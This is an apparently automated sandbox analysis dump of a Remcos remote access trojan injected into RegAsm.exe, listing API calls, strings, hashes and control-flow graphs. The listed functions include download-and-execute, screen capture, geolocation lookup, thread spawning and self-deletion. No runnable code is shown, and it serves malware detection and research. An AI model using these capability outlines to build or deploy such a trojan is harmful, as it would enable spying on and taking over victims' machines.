                                                          • Opcode Fuzzy Hash: 718f47324b8862b268baf47dc1492ba3640dfc9c03fb41c98a70d8505363c975
                                                          • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                          • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                          • FindClose.KERNEL32(00000000), ref: 100011DB
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                          • String ID:
                                                          • API String ID: 1083526818-0
                                                          • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                          • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                          • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                          • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                          APIs
                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                                          • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                                          • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                                          Strings
                                                          • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                          • String ID: http://geoplugin.net/json.gp
                                                          • API String ID: 3121278467-91888290
                                                          • Opcode ID: 961cfb38cd55e61572119c0efa1b6417dc8b0c9b1577fd71b4996ae3f28eea1b
                                                          • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                                          • Opcode Fuzzy Hash: 961cfb38cd55e61572119c0efa1b6417dc8b0c9b1577fd71b4996ae3f28eea1b
                                                          • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                                          APIs
                                                            • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                                          • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                                          • GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
                                                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                                            • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                                            • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                                            • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                          • String ID:
                                                          • API String ID: 3950776272-0
                                                          • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                          • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                                          • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                          • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                                          APIs
                                                            • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                            • Part of subcall function 00413549: RegQueryValueExA.KERNEL32 ref: 00413587
                                                            • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                                                          • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                                          • ExitProcess.KERNEL32 ref: 0040F8CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                                          • String ID: 5.1.0 Pro$override$pth_unenc
                                                          • API String ID: 2281282204-182549033
                                                          • Opcode ID: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                          • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                                          • Opcode Fuzzy Hash: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                          • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DownloadExecuteFileShell
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                          • API String ID: 2825088817-3056885514
                                                          • Opcode ID: a3a480ab064c10eed7996fc70022eb74f7b6038cba3120c8ce5290a8efdfae84
                                                          • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                                          • Opcode Fuzzy Hash: a3a480ab064c10eed7996fc70022eb74f7b6038cba3120c8ce5290a8efdfae84
                                                          • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                                          APIs
                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,005CA088), ref: 00433849
                                                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                          • String ID:
                                                          • API String ID: 1815803762-0
                                                          • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                          • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                                          • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                          • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                                          Strings
                                                          • GetSystemTimePreciseAsFileTime, xrefs: 00448972
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Time$FileSystem
                                                          • String ID: GetSystemTimePreciseAsFileTime
                                                          • API String ID: 2086374402-595813830
                                                          • Opcode ID: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                                          • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                                          • Opcode Fuzzy Hash: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                                          • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                                          APIs
                                                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B62A
                                                          • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Name$ComputerUser
                                                          • String ID:
                                                          • API String ID: 4229901323-0
                                                          • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                          • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                                          • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                          • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                          • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                                          • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                          • Instruction Fuzzy Hash:

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 100 40f34f-40f36a call 401fab call 4139a9 call 412475 69->100 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 88 40ec13-40ec1a 79->88 89 40ec0c-40ec0e 79->89 80->79 99 40ebec-40ec02 call 401fab call 4139a9 80->99 93 40ec1c 88->93 94 40ec1e-40ec2a call 41b2c3 88->94 92 40eef1 89->92 92->49 93->94 104 40ec33-40ec37 94->104 105 40ec2c-40ec2e 94->105 99->79 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 100->126 108 40ec76-40ec89 call 401e65 call 401fab 104->108 109 40ec39 call 407716 104->109 105->104 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 117 40ec3e-40ec40 109->117 120 40ec42-40ec47 call 407738 call 407260 117->120 121 40ec4c-40ec5f call 401e65 call 401fab 117->121 120->121 121->108 141 40ec61-40ec67 121->141 156 40f3a5-40f3af call 40dd42 call 414f2a 126->156 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 141->108 144 40ec69-40ec6f 141->144 144->108 147 40ec71 call 407260 144->147 147->108 179 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->179 180 40ed8a-40ed91 177->180 178->177 203 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->203 234 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 179->234 183 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 180->183 184 40ee0f-40ee19 call 409057 180->184 193 40ee1e-40ee42 call 40247c call 434798 183->193 184->193 211 40ee51 193->211 212 40ee44-40ee4f call 436e90 193->212 203->177 217 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 211->217 212->217 272 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 217->272 286 40efc1 234->286 287 40efdc-40efde 234->287 272->234 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 272->288 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->234 306 40eeef 288->306 294 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->294 290->289 291->294 344 40f101 294->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 294->345 306->92 346 40f103-40f11b call 401e65 call 401fab 344->346 345->346 356 40f159-40f16c call 401e65 call 401fab 346->356 357 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 346->357 367 40f1cc-40f1df call 401e65 call 401fab 356->367 368 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 367->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 367->380 368->367 379->380 400 40f240-40f241 SetProcessDEPPolicy 380->400 401 40f243-40f256 CreateThread 380->401 400->401 404 40f264-40f26b 401->404 405 40f258-40f262 CreateThread 401->405 409 40f279-40f280 404->409 410 40f26d-40f277 CreateThread 404->410 405->404 413 40f282-40f285 409->413 414 40f28e 409->414 410->409 415 40f287-40f28c 413->415 416 40f2cc-40f2df call 401fab call 4134ff 413->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 414->418 415->418 425 40f2e4-40f2e7 416->425 418->416 425->156 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 425->427 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                                          APIs
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                                                            • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                            • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                                                            • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE
                                                            • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                          • String ID: SG$ SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$y\$[
                                                          • API String ID: 2830904901-3619877115
                                                          • Opcode ID: 73008e0c8db4d9896f8eabd130538c454e4585cc8aa82ec9b4a810585e0e5268
                                                          • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                                          • Opcode Fuzzy Hash: 73008e0c8db4d9896f8eabd130538c454e4585cc8aa82ec9b4a810585e0e5268
                                                          • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 494 418e76-418ebd CreateDCA CreateCompatibleDC call 419325 497 418ec3-418ede call 419367 494->497 498 418ebf-418ec1 494->498 499 418ee2-418ee4 497->499 498->497 498->499 502 418f36-418f3d call 402093 499->502 503 418ee6-418ee8 499->503 506 418f42-418f4e 502->506 503->502 505 418eea-418f21 call 41939d CreateCompatibleBitmap 503->505 509 418f23-418f2f DeleteDC * 2 505->509 510 418f4f-418f59 SelectObject 505->510 513 418f30 DeleteObject 509->513 511 418f5b 510->511 512 418f6a-418f91 StretchBlt 510->512 514 418f5c-418f68 DeleteDC * 2 511->514 512->511 515 418f93-418f98 512->515 513->502 514->513 516 419014-41901c 515->516 517 418f9a-418faf GetCursorInfo 515->517 519 41905e-419070 GetObjectA 516->519 520 41901e-419025 516->520 517->516 518 418fb1-418fc5 GetIconInfo 517->518 518->516 521 418fc7-419010 DeleteObject * 2 DrawIcon 518->521 519->511 524 419076-419088 519->524 522 419027-41904c BitBlt 520->522 523 41904e-41905b 520->523 521->516 522->519 523->519 525 41908a-41908c 524->525 526 41908e-419098 524->526 527 4190c5 525->527 528 4190c9-4190d2 526->528 529 41909a-4190a4 526->529 527->528 531 4190d3-41910d LocalAlloc 528->531 529->528 530 4190a6-4190b0 529->530 530->528 532 4190b2-4190b8 530->532 533 419119-419150 GlobalAlloc 531->533 534 41910f-419116 531->534 535 4190c2-4190c4 532->535 536 4190ba-4190c0 532->536 537 419152-419156 533->537 538 41915b-419170 GetDIBits 533->538 534->533 535->527 536->531 537->514 539 419172-419193 DeleteDC * 2 DeleteObject GlobalFree 538->539 540 419198-419260 call 4020df * 2 call 40250a call 403376 call 40250a call 403376 call 40250a call 403376 DeleteObject GlobalFree DeleteDC 538->540 539->502 557 419262-419263 DeleteDC 540->557 558 419265-419289 call 402055 call 401fd8 * 2 540->558 557->558 558->506
                                                          APIs
                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                                            • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                                          • DeleteDC.GDI32(00000000), ref: 00418F2A
                                                          • DeleteDC.GDI32(00000000), ref: 00418F2D
                                                          • DeleteObject.GDI32(00000000), ref: 00418F30
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                                          • DeleteDC.GDI32(00000000), ref: 00418F62
                                                          • DeleteDC.GDI32(00000000), ref: 00418F65
                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                                          • GetCursorInfo.USER32(?), ref: 00418FA7
                                                          • GetIconInfo.USER32 ref: 00418FBD
                                                          • DeleteObject.GDI32(?), ref: 00418FEC
                                                          • DeleteObject.GDI32(?), ref: 00418FF9
                                                          • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                                          • DeleteDC.GDI32(?), ref: 0041917C
                                                          • DeleteDC.GDI32(00000000), ref: 0041917F
                                                          • DeleteObject.GDI32(00000000), ref: 00419182
                                                          • GlobalFree.KERNEL32(?), ref: 0041918D
                                                          • DeleteObject.GDI32(00000000), ref: 00419241
                                                          • GlobalFree.KERNELBASE(?), ref: 00419248
                                                          • DeleteDC.GDI32(?), ref: 00419258
                                                          • DeleteDC.GDI32(00000000), ref: 00419263
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                          • String ID: DISPLAY
                                                          • API String ID: 4256916514-865373369
                                                          • Opcode ID: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
                                                          • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
